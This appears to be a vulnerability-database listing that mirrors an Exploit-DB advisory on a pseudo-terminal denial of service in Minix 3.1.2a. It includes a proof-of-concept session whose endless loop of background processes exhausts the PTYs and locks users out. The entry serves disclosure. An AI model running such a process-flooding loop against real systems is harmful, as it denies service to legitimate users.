Minix 3.1.2a - Psuedo Terminal Denial of Service

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1056758 漏洞类型
发布时间 2008-07-23 更新时间 2008-07-23
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/32112
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/30357/info

Minix is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to prevent users from opening new pseudo terminals, denying service to legitimate users.

Minix 3.1.2a is vulnerable; other versions may also be affected. 

$ uname -a
Minix 192.168.1.2 3 1.2a i686
$ while true ; do (yes "yes yes minix uh ah"&) ; done
[snip snip]
$ ^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C^C

...disconnected
telnet 192.168.1.2
Trying 192.168.1.2...
Connected to 192.168.1.2.
Escape character is '^]'.
I am sorry, but there is no free PTY left!
Connection closed by foreign host.